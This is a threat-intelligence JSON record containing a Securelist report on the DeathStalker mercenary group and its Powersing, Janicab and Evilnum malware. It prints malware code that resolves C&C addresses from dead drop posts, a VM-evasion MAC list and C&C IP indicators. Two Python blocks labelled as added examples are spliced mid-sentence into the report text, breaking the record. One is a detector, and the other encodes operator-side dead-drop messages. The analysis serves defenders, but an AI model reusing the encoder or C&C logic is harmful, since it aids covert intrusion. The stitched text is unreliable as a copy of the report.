{
	"id": "4f521747-ac82-4982-bebe-0255b38dfa82",
	"created_at": "2026-04-06T00:09:33.443193Z",
	"updated_at": "2026-04-10T13:11:18.711188Z",
	"deleted_at": null,
	"sha1_hash": "570b18f11507f076c46b8428c1ebcb9dbe685bf9",
	"title": "Lifting the veil on DeathStalker, a mercenary triumvirate",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 609268,
	"plain_text": "Lifting the veil on DeathStalker, a mercenary triumvirate\r\nBy Ivan Kwiatkowski\r\nPublished: 2020-08-24 · Archived: 2026-04-05 15:58:24 UTC\r\nState-sponsored threat actors and sophisticated attacks are often in the spotlight. Indeed, their innovative\r\ntechniques, advanced malware platforms and 0-day exploit chains capture our collective imagination. Yet these\r\ngroups still aren’t likely to be a part of the risk model at most companies, nor should they be. Businesses today are\r\nfaced with an array of much more immediate threats, from ransomware and customer information leaks, to\r\ncompetitors engaging in unethical business practices. In this blog post, we’ll be focusing on DeathStalker: a\r\nunique threat group that appears to target law firms and companies in the financial sector (although we’ve\r\noccasionally seen them in other verticals as well). As far as we can tell, this actor isn’t motivated by financial gain.\r\nThey don’t deploy ransomware, steal payment information to resell it, or engage in any type of activity commonly\r\nassociated with the cybercrime underworld. Their interest in gathering sensitive business information leads us to\r\nbelieve that DeathStalker is a group of mercenaries offering hacking-for-hire services, or acting as some sort of\r\ninformation broker in financial circles.\r\nDeathStalker first came to our attention through a PowerShell-based implant called Powersing. By unraveling this\r\nthread, we were able to identify activities dating back to 2018, and possibly even 2012. 
But before we dive into a\r\nhistory of DeathStalker and possible links to known groups, we’ll start with a bit of background, beginning with\r\nthis actor’s current arsenal.\r\nOverview\r\nRecent operations we attribute to this threat actor rely on the same intrusion vector: spear-phishing emails with\r\nattached archives containing a malicious LNK file.\r\nDespite looking like documents in Explorer or in popular archive-extraction products, the shortcuts lead to\r\ncmd.exe. These shortcut files have the following structure (diagram not reproduced in this text version):\r\nhttps://securelist.com/deathstalker-mercenary-triumvirate/98177/\r\nPage 1 of 12\n\nClicking them initiates a convoluted sequence resulting in the execution of arbitrary code on the victim’s machine.\r\nA short PowerShell script, passed through cmd.exe’s arguments, bootstraps the following chain (diagram not reproduced in this text version):\r\nStage 0’s role is to extract and execute the next element of the chain, as well as a decoy document\r\nembedded inside the LNK file to display to the user. This creates the illusion of having clicked on a real\r\ndocument and ensures the victim doesn’t get suspicious.\r\nStage 1 is a PowerShell script containing a C# assembly. It extracts a “DLL” file from the shortcut and locates a\r\nBase64-encoded list of URLs at a fixed offset, connects to a dead drop resolver (more on this in the next\r\nsection) to obtain the cryptographic material used to decode the last stage of the chain, and establishes\r\npersistence by creating a shortcut (using the dropped icon) in the Windows startup folder pointing to the VBE\r\nstartup script.\r\nStage 2, finally, is the actual malware implant used to take control of the victim’s machine.
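A detection for the chain described above (Explorer starting cmd.exe from the shortcut, the PowerShell bootstrap carried in cmd.exe’s arguments, and the startup-folder shortcut that later launches the VBE script through a script host). The Python below is an added example written for this page, not code from the original post or from the Powersing toolset. It assumes a simplified, Sysmon-style process-creation record (my own field names: pid, ppid, image, cmdline); the sample events, the user name and the script and task file names in them are constructed, and the rules accept both backslash and forward-slash image paths.

```python
# Added example: match the Powersing process chain in process-creation telemetry.
# Event fields below are my own simplification of Sysmon Event ID 1 style records.
SEP = chr(92)  # a backslash, spelled out so this sample contains no escape sequences
SCRIPT_HOSTS = {'wscript.exe', 'cscript.exe'}


def basename(path):
    # Last path component, lower-cased; accepts both Windows and forward-slash paths.
    return path.replace(SEP, '/').rsplit('/', 1)[-1].lower()


def ancestors(event, by_pid):
    # Image names up the parent chain, nearest first; stops at the first pid we do not hold.
    chain = []
    ppid = event['ppid']
    while ppid in by_pid:
        parent = by_pid[ppid]
        chain.append(basename(parent['image']))
        ppid = parent['ppid']
    return chain


def evaluate(event, by_pid):
    # Names of the rules this one event satisfies.
    image = basename(event['image'])
    cmdline = event['cmdline'].lower()
    parents = ancestors(event, by_pid)
    hits = []
    # Rule 1: the shortcut itself. A click in Explorer starts cmd.exe, and the arguments
    # of cmd.exe carry the PowerShell bootstrap (stage 0).
    if image == 'cmd.exe' and parents[:1] == ['explorer.exe'] and 'powershell' in cmdline:
        hits.append('lnk_cmd_powershell_bootstrap')
    # Rule 2: the same chain seen from the interpreter: powershell.exe under cmd.exe under explorer.exe.
    if image == 'powershell.exe' and parents[:2] == ['cmd.exe', 'explorer.exe']:
        hits.append('explorer_cmd_powershell_chain')
    # Rule 3: persistence. A Windows script host running an encoded VBScript (.vbe), which is
    # what the startup-folder shortcut points at. Assumption: .vbe is rare enough in a managed
    # fleet to be worth an alert on its own; tune this if your environment uses it legitimately.
    if image in SCRIPT_HOSTS and '.vbe' in cmdline:
        hits.append('script_host_vbe')
    return hits


def detect(events):
    # pid to list of matched rule names, for every event that matched at least one rule.
    by_pid = {e['pid']: e for e in events}
    findings = {}
    for e in events:
        hits = evaluate(e, by_pid)
        if hits:
            findings[e['pid']] = hits
    return findings


def win(*parts):
    # Build a Windows path from components, for the constructed sample below.
    return SEP.join(('C:',) + parts)


PS_EXE = win('Windows', 'System32', 'WindowsPowerShell', 'v1.0', 'powershell.exe')
# Constructed sample, not captured telemetry. pids 200 and 300 are the shortcut chain,
# 400 is the post-reboot persistence, 500 and 600 are benign look-alikes.
SAMPLE_EVENTS = [
    {'pid': 100, 'ppid': 1, 'image': win('Windows', 'explorer.exe'), 'cmdline': 'explorer.exe'},
    {'pid': 200, 'ppid': 100, 'image': win('Windows', 'System32', 'cmd.exe'),
     'cmdline': 'cmd.exe /c powershell -nop -w hidden -c [stage 0 script]'},
    {'pid': 300, 'ppid': 200, 'image': PS_EXE, 'cmdline': 'powershell -nop -w hidden -c [stage 0 script]'},
    {'pid': 400, 'ppid': 100, 'image': win('Windows', 'System32', 'wscript.exe'),
     'cmdline': 'wscript.exe ' + win('Users', 'victim', 'AppData', 'Roaming', 'update.vbe')},
    {'pid': 500, 'ppid': 100, 'image': win('Windows', 'System32', 'cmd.exe'), 'cmdline': 'cmd.exe'},
    {'pid': 600, 'ppid': 50, 'image': PS_EXE, 'cmdline': 'powershell.exe -File maintenance.ps1'},
]

if __name__ == '__main__':
    for pid, rules in sorted(detect(SAMPLE_EVENTS).items()):
        print(pid, rules)
```

Rule 1 fires on the first process the shortcut creates, so it is the earliest signal; rule 2 is its mirror image and still works when the cmd.exe record itself was not collected. Rule 3 is deliberately broad (any .vbe under a script host) and is where false positives would come from in an environment that uses encoded VBScript; narrowing it to scripts started through the Startup folder needs the shortcut path, which the process record alone does not carry.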
Stage 2 connects to\r\none of the dead drop resolvers to get the address of the real C\u0026C server and enters a loop that looks for\r\norders every few seconds.\r\nUpon system restart, the VBE startup script – which closely resembles stage 0 – is automatically executed,\r\nonce again leading all the way to Powersing stage 2.\r\nCommunications with the C\u0026C server involve the exchange of JSON-encoded objects. Powersing only has two\r\ntasks:\r\nCapture periodic screenshots from the victim’s machine, which are immediately sent to the C\u0026C server\r\n(two built-in commands allow operators to change screenshot quality and periodicity)\r\nExecute arbitrary PowerShell scripts provided by the C\u0026C\r\nOn stages 1 and 2, security software evasion is carried out with a high degree of variation across the different\r\nsamples we’ve analyzed. Depending on the AV detected on the machine, Powersing may opt for alternative\r\npersistence methods, or even stop running entirely. We suspect that the group behind this toolset performs\r\ndetection tests before each of their campaigns and updates their scripts based on the results. This indicates an\r\niterative and fast-paced approach to software design. It’s worth pointing out that stage 2 actively looks for traces\r\nof virtualization (for example, vendor-specific MAC addresses) and malware analysis tools on the machine, and\r\nreports this information to the C\u0026C server.\r\nTo wrap up this section, we’d like to mention that Powersing isn’t a monolithic malware platform. Instead, it’s a\r\nstealthy foothold inside the victim’s network whose key role is to enable the projection of further tools.\r\nDead drop resolvers\r\nThe DeathStalker toolchain leverages a number of public services as dead drop resolvers. These services provide\r\na way for attackers to store data at a fixed URL through public posts, comments, user profiles, content\r\ndescriptions, etc.
Messages left by the attackers follow two patterns: “My keyboard doesn’t work…\r\n[string].” and “Yo bro I sing [Base64 encoded string] yeah”.\r\nDuring our investigation of this threat actor, we discovered such messages on:\r\nGoogle+\r\nImgur\r\nReddit\r\nShockChan\r\nTumblr\r\nTwitter\r\nYouTube\r\nWordPress\r\nIn all likelihood, this list isn’t exhaustive. A number of these messages can be discovered through simple Google\r\nqueries. Powersing’s first order of business is to connect to any dead drop resolver it knows to retrieve this\r\ninformation. Stage 1 consumes the first string of these messages, which contains the AES key used to decode\r\nstage 2. Then stage 2 connects to the dead drop resolver to obtain the integer encoded in the second string. As the\r\ncode excerpt below shows, this integer is divided by an arbitrary constant (which varies depending on the sample)\r\nbefore being converted to an IP address:\r\npublic string LongToIP(string long_ip_string)\r\n{\r\n  long longIP;\r\n  long.TryParse(long_ip_string, out longIP);\r\n  longIP = longIP / 25835;  // NB: divide integer by an arbitrary constant\r\n  string ip = string.Empty;\r\n  for (int i = 0; i \u003c 4; i++)\r\n  {\r\n    int num = (int)(longIP / Math.Pow(256, (3 - i)));\r\n    longIP = longIP - (long)(num * Math.Pow(256, (3 - i)));\r\n    if (i == 0)\r\n      ip = num.ToString();\r\n    else\r\n      ip = ip + \".\" + num.ToString();\r\n  }\r\n  return ip;\r\n}\r\nThis IP address is then stored on the user’s hard drive and used to establish a connection to the real C\u0026C server\r\nused by the operators to control Powersing. Relying on well-known public services allows cybercriminals to blend\r\ninitial backdoor communications into legitimate network traffic.
It also limits what defenders can do to hinder\r\ntheir operations, as these platforms can’t generally be blocklisted at the company level, and getting content taken\r\ndown from them can be a difficult and lengthy process. However, this comes at a price: the internet never forgets,\r\nand it’s also difficult for cybercriminals to remove traces of their operations. Thanks to the data indexed or\r\narchived by search engines, we estimate that Powersing was first used around August 2017.\r\nA final detail we’d like to mention is that a number of Powersing C\u0026Cs we discovered had SSL certificates\r\nreminiscent of Sofacy’s infamous Chopstick C\u0026C “IT Department” certificates. We’re confident this\r\ninfrastructure isn’t linked with Sofacy and believe this is an attempt by the threat actor to lead defenders to\r\nerroneous conclusions.\r\nDeathStalker links to known groups\r\nJanicab\r\nSec0wn’s original blog post introducing Powersing hinted at possible links with a malware family called Janicab,\r\nwhose older samples date back to 2012. However, to the best of our knowledge, this connection was never\r\nexplored publicly. Ultimately, we obtained one of the malware samples listed by F-Secure in a 2015 blog post\r\n(1fe4c500c9f0f7630a6037e2de6580e9) on Janicab to look for similarities.\r\nThis file is another LNK pointing to cmd.exe that drops a VBE script on the system when clicked, as well as a\r\ndecoy document.
The script establishes a connection to an unlisted YouTube video to obtain C\u0026C information\r\nembedded in the description (screenshot not reproduced in this text version).\r\nThe integer obtained on this page is then divided by a constant before being converted to an IP address:\r\nSet objRE = New RegExp\r\nWith objRE\r\n  .Pattern = \"our (.*)th psy anniversary\"\r\n  .IgnoreCase = True\r\nEnd With\r\nSet objMatch = objRE.Execute( outputHTML )\r\nIf objMatch.Count = 1 Then\r\n  server = \"\"\r\n  server = objMatch.Item(0).Submatches(0)\r\n  server = server / 31337  'NB: divide integer by an arbitrary constant\r\n  'msgbox(server)\r\n  server = IPConvert(server)\r\n  server = \"http://\" \u0026 server \u0026 \"/wp-admin-content\"\r\nEnd If\r\nWhile the use of YouTube as a dead drop resolver alone wouldn’t be sufficient to establish a link between the two\r\ngroups, we feel that the process of obtaining an integer somewhere online and dividing it before interpreting it as\r\nan IP address is unique enough to draw a first connection.\r\nJanicab’s features also remind us of Powersing’s: the sample contains VM detection based on the MAC address of\r\nthe machine, looks for malware analysis programs and has familiar antivirus software evasion routines.
Janicab\r\nalso periodically sends screenshot captures of the victim’s desktop to the C\u0026C and appears to enable the execution\r\nof arbitrary Python scripts.\r\nMore recent versions of Janicab (85ed6ab8f60087e80ab3ff87c15b1174) also involve network traffic reminiscent\r\nof Powersing, especially when the malware registers with its C\u0026C server:\r\nPowersing registration request (POST data):\r\n{\r\n  \"un\": \"[username]\",\r\n  \"cn\": \"[computer name]\",\r\n  \"av\": \"[installed AV program]\",\r\n  \"dob\": \"[OS installation date]\",\r\n  \"os\": \"[OS version]\",\r\n  \"ou\": \"[campaign identifier]\",\r\n  \"dc\": \"[version]\"\r\n}\r\nJanicab registration request:\r\nGET /gid.php?action=add\u0026cn=[computer name]\u0026un=[username]\u0026v=[version]\u0026av=[installed AV program]\u0026an=[campaign identifier]\r\nIn addition, this sample contains the exact same list of denylisted VM MAC addresses as the Powersing sample\r\nintroduced earlier in this post, in the same order.\r\nPowersing’s denylisted MAC addresses | Janicab’s denylisted MAC addresses\r\nvirtual_mac_prefix.Add(\"00015D\"); | macs(0) = \"00-01-5D\"\r\nvirtual_mac_prefix.Add(\"0003BA\"); | macs(1) = \"00-03-BA\"\r\nvirtual_mac_prefix.Add(\"000782\"); | macs(2) = \"00-07-82\"\r\nvirtual_mac_prefix.Add(\"000F4B\"); | macs(3) = \"00-0F-4B\"\r\nvirtual_mac_prefix.Add(\"00104F\"); | macs(4) = \"00-10-4F\"\r\nvirtual_mac_prefix.Add(\"0010E0\"); | macs(5) = \"00-10-E0\"\r\nvirtual_mac_prefix.Add(\"00144F\"); | macs(6) = \"00-14-4F\"\r\nvirtual_mac_prefix.Add(\"0020F2\"); | macs(7) = \"00-20-F2\"\r\nvirtual_mac_prefix.Add(\"002128\"); | macs(8) = \"00-21-28\"\r\nvirtual_mac_prefix.Add(\"0021F6\"); | macs(9) = \"00-21-F6\"\r\nvirtual_mac_prefix.Add(\"005056\"); | macs(10) = \"00-50-56\"\r\nvirtual_mac_prefix.Add(\"000C29\"); | macs(11) = \"00-0C-29\"\r\nvirtual_mac_prefix.Add(\"000569\"); | macs(12) = \"00-05-69\"\r\nvirtual_mac_prefix.Add(\"0003FF\"); | macs(13) = \"00-03-FF\"\r\nvirtual_mac_prefix.Add(\"001C42\"); | macs(14) = 
\"00-1C-42\"\r\nvirtual_mac_prefix.Add(\"00163E\"); | macs(15) = \"00-16-3E\"\r\nvirtual_mac_prefix.Add(\"080027\"); | macs(16) = \"08-00-27\"\r\nvirtual_mac_prefix.Add(\"001C14\"); | macs(17) = \"00-1C-14\"\r\nvirtual_mac_prefix.Add(\"080020\"); | macs(18) = \"08-00-20\"\r\nvirtual_mac_prefix.Add(\"000D3A\"); | macs(19) = \"00-0D-3A\"\r\nvirtual_mac_prefix.Add(\"00125A\"); | macs(20) = \"00-12-5A\"\r\nvirtual_mac_prefix.Add(\"00155D\"); | macs(21) = \"00-15-5D\"\r\nvirtual_mac_prefix.Add(\"0017FA\"); | macs(22) = \"00-17-FA\"\r\nvirtual_mac_prefix.Add(\"001DD8\"); | macs(23) = \"00-1D-D8\"\r\nvirtual_mac_prefix.Add(\"002248\"); | macs(24) = \"00-22-48\"\r\nvirtual_mac_prefix.Add(\"0025AE\"); | macs(25) = \"00-25-AE\"\r\nvirtual_mac_prefix.Add(\"0050C2\"); | macs(26) = \"00-50-C2\"\r\nvirtual_mac_prefix.Add(\"0050F2\"); | macs(27) = \"00-50-F2\"\r\nvirtual_mac_prefix.Add(\"444553\"); | macs(28) = \"44-45-53\"\r\nvirtual_mac_prefix.Add(\"7CED8D\"); | macs(29) = \"7C-ED-8D\"\r\nEvilnum\r\nAnother possible connection worth investigating concerns the more recent Evilnum malware family, which was\r\nthe subject of an in-depth blog post from ESET last July, as well as a couple of our own private reports. ESET’s\r\npost details another LNK-based infection chain leading to the execution of JavaScript-based malware.
Again, we\r\nobtained an old Evilnum sample (219dedb53da6b1dce0d6c071af59b45c) and observed that it also obtained C\u0026C\r\ninformation from a dead drop resolver (GitHub), converting the integer it retrieved to an IP address with the following code:\r\n// items, get_page_content_with_ie, extract_string and num2dot are defined elsewhere in the sample.\r\nfunction extract_srvaddr() {\r\n  serverFound = false;\r\n  pattern = 'our news start at (.*) thank you';\r\n  while(serverFound == false) {\r\n    var item = items[Math.floor(Math.random()*items.length)];\r\n    var html = get_page_content_with_ie(item,'');\r\n    if(html != '') {\r\n      var match = extract_string(pattern, html);\r\n      if(match != null) {\r\n        srv = num2dot(match[1]/666); // NB: divide integer by a constant\r\n        srv = srv + \"/Validate\";\r\n        srv_stat = get_page_content_with_ie(srv+\"/ValSrv\", '');\r\n        validate_str = extract_string('youwillnotfindthisanywhare', srv_stat);\r\n        if(validate_str == 'youwillnotfindthisanywhare') {\r\n          serverFound = true;\r\n          return srv;\r\n        }\r\n      }\r\n    }\r\n  }\r\n}\r\nWe can’t help but notice the pattern of looking for a specific string using a regular expression to obtain an integer,\r\nthen dividing this integer by a constant resulting in the IP address of the C\u0026C server. While Evilnum provides\r\nmore capabilities than Powersing, it can also capture screenshots and send them to the C\u0026C server.\r\nIn terms of victimology, Evilnum focuses on companies in the Fintech sector. It appears to be more interested in\r\nbusiness intelligence than financial gain.
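The three excerpts above, Powersing’s LongToIP, Janicab’s VBScript and Evilnum’s extract_srvaddr, implement one scheme: find a sentence with a regular expression, read the integer it carries, divide by a per-sample constant, and unpack the quotient as a big-endian IPv4 address. The Python below is an added example written for this page, not code from the post or from any of the three families. It implements both the operator side and the implant side of that scheme for all three message formats and adds the divisibility check a triage script needs. Assumptions: the Powersing Base64 string decodes to the decimal integer (the post only says the integer is Base64-encoded), the Janicab and Evilnum sentence templates mirror the quoted regexes, the divisors are the per-sample constants quoted above, and the sample page text and the TEST-NET addresses in it are constructed.

```python
import base64
import re

# Added example. Per family: regex locating the token, per-sample divisor, Base64 flag.
# Janicab and Evilnum regexes follow the quoted code, narrowed to digits; the Powersing
# sentence shape is from the post and the character class is mine. Divisors vary per sample.
FAMILIES = {
    'powersing': (re.compile(r'Yo bro I sing ([A-Za-z0-9+/=]+) yeah'), 25835, True),
    'janicab': (re.compile(r'our ([0-9]+)th psy anniversary', re.IGNORECASE), 31337, False),
    'evilnum': (re.compile(r'our news start at ([0-9]+) thank you'), 666, False),
}
# Operator-side sentence templates; assumed to mirror the regexes above.
TEMPLATES = {
    'powersing': 'Yo bro I sing {} yeah',
    'janicab': 'our {}th psy anniversary',
    'evilnum': 'our news start at {} thank you',
}


def long_to_ip(value):
    # Big-endian unpacking, the same arithmetic as LongToIP, plus the range check it lacks.
    if value not in range(2 ** 32):
        raise ValueError('not a 32-bit value: %d' % value)
    return '.'.join(str((value // 256 ** (3 - i)) % 256) for i in range(4))


def ip_to_long(ip):
    # Inverse of long_to_ip; rejects anything that is not four octets.
    octets = [int(p) for p in ip.split('.')]
    if len(octets) != 4 or any(o not in range(256) for o in octets):
        raise ValueError('bad IPv4 address: %s' % ip)
    return sum(o * 256 ** (3 - i) for i, o in enumerate(octets))


def encode_dead_drop(family, ip):
    # What the operator posts: the address as an integer, multiplied by the constant.
    regex, divisor, is_b64 = FAMILIES[family]
    token = str(ip_to_long(ip) * divisor)
    if is_b64:
        token = base64.b64encode(token.encode()).decode()
    return TEMPLATES[family].format(token)


def decode_dead_drop(family, text):
    # The implant side: None if no message for this family is present in text.
    regex, divisor, is_b64 = FAMILIES[family]
    match = regex.search(text)
    if match is None:
        return None
    token = match.group(1)
    if is_b64:
        token = base64.b64decode(token).decode()
    number = int(token)
    # A genuine message is an exact multiple of the sample constant. A remainder means a
    # different sample (other constant) or a false match on unrelated text, so say so rather
    # than silently truncating the way the integer division in the original does.
    if number % divisor != 0:
        raise ValueError('%s: %d is not a multiple of %d' % (family, number, divisor))
    return long_to_ip(number // divisor)


def scan(text):
    # Try every known family against one page of scraped text.
    found = {}
    for family in FAMILIES:
        ip = decode_dead_drop(family, text)
        if ip is not None:
            found[family] = ip
    return found


# Constructed sample page: a decoy line that resembles the Evilnum sentence but carries no
# integer, then three operator posts pointing at TEST-NET addresses. chr(10) is a newline.
SAMPLE_PAGE = chr(10).join([
    'Great video!',
    'our news start at 12:00 thank you',
    encode_dead_drop('powersing', '192.0.2.10'),
    encode_dead_drop('janicab', '198.51.100.7'),
    encode_dead_drop('evilnum', '203.0.113.250'),
])

if __name__ == '__main__':
    print(scan(SAMPLE_PAGE))
```

The divisibility check is the part worth keeping: Powersing’s C# performs an integer division and Janicab’s VBScript a floating one, so both silently accept junk, whereas refusing non-multiples turns a scraped page that merely resembles the pattern into an error instead of a bogus address. The constants are per sample, so decoding messages for a new sample means pulling the constant from that sample first.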
Evilnum’s focus on business intelligence is consistent with the DeathStalker activity we’ve observed thus far.\r\nOne final connection we want to mention is that recent Evilnum (835d94b0490831da27d9bf4e9f4b429c) and\r\nJanicab samples have some slight code overlaps, despite being written in different languages:\r\nVariables with similar names (“ieWatchdogFilename” for Janicab, “ieWatchdogPath” for Evilnum) used in\r\nfunctions performing equivalent tasks\r\nTwo functions used for cleanup have identical names: “deleteLeftOvers”\r\nWe feel that these names are unique enough to create an additional link between the two malware families. Less\r\nconclusively, this Evilnum sample also contains a function called “long2ip” to convert integers to IP addresses,\r\nwhile Powersing contains a similar implementation under the “LongToIP” name.\r\nSummary\r\nPowersing, Janicab and Evilnum are three scripting-language-based toolchains exhibiting the following\r\nsimilarities:\r\nAll three are distributed through LNK files contained in archives delivered through spear-phishing\r\nThey obtain C\u0026C information from dead drop resolvers using regular expressions and hardcoded sentences\r\nIP addresses are obtained in the form of integers that are then divided by a hardcoded constant before being\r\nconverted\r\nMinor code overlaps between the three malware families could indicate that they’ve been developed by the\r\nsame team, or inside a group that shares software development practices\r\nThe three malware families all have screenshot capture capabilities. While not original in itself, this isn’t\r\nusually part of the development priorities of such groups and could be indicative of a shared design\r\nspecification\r\nFinally, while we don’t have a lot of information about Janicab’s victimology, Powersing and Evilnum both\r\ngo after business intelligence, albeit in different industry verticals.
Both sets of activities are consistent\r\nwith the hypothesis that they’re run by a mercenary outfit.\r\nWhile none of these points on their own are sufficient in our eyes to draw a conclusion, we feel that together they\r\nallow us to assess with medium confidence that Powersing, Evilnum and Janicab are operated by the same\r\ngroup. Additional data shared with us by industry partners that we can’t disclose at the moment also supports this\r\nconclusion.\r\nVictimology\r\nDeathStalker primarily targets private entities in the financial sector, including law offices, wealth consultancy\r\nfirms, financial technology companies, and so on. In one instance, we also observed DeathStalker\r\nattacking a diplomatic entity.\r\nWe’ve been able to identify Powersing-related activities in Argentina, China, Cyprus, Israel, Lebanon,\r\nSwitzerland, Taiwan, Turkey, the United Kingdom and the United Arab Emirates. We also located Evilnum\r\nvictims in Cyprus, India, Lebanon, Russia, Jordan and the United Arab Emirates.\r\nHowever, we believe that DeathStalker chooses its targets purely based on their perceived value, or perhaps\r\nfollowing customer requests. In this context, we assess that any company in the financial sector could catch\r\nDeathStalker’s attention, no matter its geographic location.\r\nConclusion\r\nIn this blog post, we described a modern infection chain that’s still actively used and developed by a threat actor\r\ntoday. It doesn’t contain any innovative tricks or sophisticated methods, and certain components of the chain may\r\nactually appear needlessly convoluted. Yet if the hypothesis is correct that the same group operates Janicab and\r\nPowersing, it indicates that they’ve been leveraging the same methodologies since 2012.
In the infosec world, it\r\ndoesn’t get more “tried and true” than this.\r\nBased on the limited technological means either of these toolchains displays, we believe they’re good examples of\r\nwhat small groups or even skilled individuals can create. The value we see in publicly releasing information about\r\nDeathStalker is to have this threat actor serve as a baseline of what the private sector should be able to defend\r\nagainst. Groups like DeathStalker represent the type of cyberthreat most companies today are likely to face more\r\nthan state-sponsored APTs. Due to its ongoing operations (DeathStalker notably leveraged COVID-19 for both\r\nJanicab and Powersing implant deployment since March 2020) and continuous activity since 2018, we believe that\r\nDeathStalker is still developing its toolset, and that we’ll have more to report on in the near future.\r\nWe advise defenders to pay close attention to any process creation related to native Windows interpreters for\r\nscripting languages, such as powershell.exe and cscript.exe. Wherever possible, these utilities should be made\r\nunavailable. We also recommend that future awareness trainings and security product assessments include\r\ninfection chains based on LNK files.\r\nFor more information about both DeathStalker and Evilnum activity, subscribe to our private reporting services:\r\nintelreports@kaspersky.com\r\nIndicators of Compromise\r\nC\u0026C servers\r\n54.38.192.174 Powersing C\u0026C\r\n91.229.76.17 Powersing C\u0026C\r\n91.229.76.153 Powersing C\u0026C\r\n91.229.77.240 Powersing C\u0026C\r\n91.229.77.120 Powersing C\u0026C\r\n91.229.79.120 Powersing C\u0026C\r\n105.104.10.115 Powersing C\u0026C\r\nSource: https://securelist.com/deathstalker-mercenary-triumvirate/98177/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://securelist.com/deathstalker-mercenary-triumvirate/98177/"
	],
	"report_names": [
		"98177"
	],
	"threat_actors": [
		{
			"id": "059b16f8-d4e0-4399-9add-18101a2fd298",
			"created_at": "2022-10-25T15:50:23.29434Z",
			"updated_at": "2026-04-10T02:00:05.380938Z",
			"deleted_at": null,
			"main_name": "Evilnum",
			"aliases": [
				"Evilnum"
			],
			"source_name": "MITRE:Evilnum",
			"tools": [
				"More_eggs",
				"EVILNUM",
				"LaZagne"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f7aa6029-2b01-4eee-8fe6-287330e087c9",
			"created_at": "2022-10-25T16:07:23.536763Z",
			"updated_at": "2026-04-10T02:00:04.646542Z",
			"deleted_at": null,
			"main_name": "Deceptikons",
			"aliases": [
				"DeathStalker",
				"Deceptikons"
			],
			"source_name": "ETDA:Deceptikons",
			"tools": [
				"EVILNUM",
				"Evilnum",
				"Janicab",
				"PowerPepper",
				"Powersing",
				"VileRAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "dfee8b2e-d6b9-4143-a0d9-ca39396dd3bf",
			"created_at": "2022-10-25T16:07:24.467088Z",
			"updated_at": "2026-04-10T02:00:05.000485Z",
			"deleted_at": null,
			"main_name": "Circles",
			"aliases": [],
			"source_name": "ETDA:Circles",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "8ce861d7-7fbd-4d9c-a211-367c118bfdbd",
			"created_at": "2023-01-06T13:46:39.153487Z",
			"updated_at": "2026-04-10T02:00:03.232006Z",
			"deleted_at": null,
			"main_name": "Evilnum",
			"aliases": [
				"EvilNum",
				"Jointworm",
				"KNOCKOUT SPIDER",
				"DeathStalker",
				"TA4563"
			],
			"source_name": "MISPGALAXY:Evilnum",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "730dfa6e-572d-473c-9267-ea1597d1a42b",
			"created_at": "2023-01-06T13:46:38.389985Z",
			"updated_at": "2026-04-10T02:00:02.954105Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"Pawn Storm",
				"ATK5",
				"Fighting Ursa",
				"Blue Athena",
				"TA422",
				"T-APT-12",
				"APT-C-20",
				"UAC-0001",
				"IRON TWILIGHT",
				"SIG40",
				"UAC-0028",
				"Sofacy",
				"BlueDelta",
				"Fancy Bear",
				"GruesomeLarch",
				"Group 74",
				"ITG05",
				"FROZENLAKE",
				"Forest Blizzard",
				"FANCY BEAR",
				"Sednit",
				"SNAKEMACKEREL",
				"Tsar Team",
				"TG-4127",
				"STRONTIUM",
				"Grizzly Steppe",
				"G0007"
			],
			"source_name": "MISPGALAXY:APT28",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "39ea99fb-1704-445d-b5cd-81e7c99d6012",
			"created_at": "2022-10-25T16:07:23.601894Z",
			"updated_at": "2026-04-10T02:00:04.684134Z",
			"deleted_at": null,
			"main_name": "Evilnum",
			"aliases": [
				"G0120",
				"Jointworm",
				"Operation Phantom in the [Command] Shell",
				"TA4563"
			],
			"source_name": "ETDA:Evilnum",
			"tools": [
				"Bypass-UAC",
				"Cardinal RAT",
				"ChromeCookiesView",
				"EVILNUM",
				"Evilnum",
				"IronPython",
				"LaZagne",
				"MailPassView",
				"More_eggs",
				"ProduKey",
				"PyVil",
				"PyVil RAT",
				"SONE",
				"SpicyOmelette",
				"StealerOne",
				"Taurus Loader Stealer Module",
				"Taurus Loader TeamViewer Module",
				"Terra Loader",
				"TerraPreter",
				"TerraStealer",
				"TerraTV"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "e3767160-695d-4360-8b2e-d5274db3f7cd",
			"created_at": "2022-10-25T16:47:55.914348Z",
			"updated_at": "2026-04-10T02:00:03.610018Z",
			"deleted_at": null,
			"main_name": "IRON TWILIGHT",
			"aliases": [
				"APT28 ",
				"ATK5 ",
				"Blue Athena ",
				"BlueDelta ",
				"FROZENLAKE ",
				"Fancy Bear ",
				"Fighting Ursa ",
				"Forest Blizzard ",
				"GRAPHITE ",
				"Group 74 ",
				"PawnStorm ",
				"STRONTIUM ",
				"Sednit ",
				"Snakemackerel ",
				"Sofacy ",
				"TA422 ",
				"TG-4127 ",
				"Tsar Team ",
				"UAC-0001 "
			],
			"source_name": "Secureworks:IRON TWILIGHT",
			"tools": [
				"Downdelph",
				"EVILTOSS",
				"SEDUPLOADER",
				"SHARPFRONT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ae320ed7-9a63-42ed-944b-44ada7313495",
			"created_at": "2022-10-25T15:50:23.671663Z",
			"updated_at": "2026-04-10T02:00:05.283292Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"APT28",
				"IRON TWILIGHT",
				"SNAKEMACKEREL",
				"Group 74",
				"Sednit",
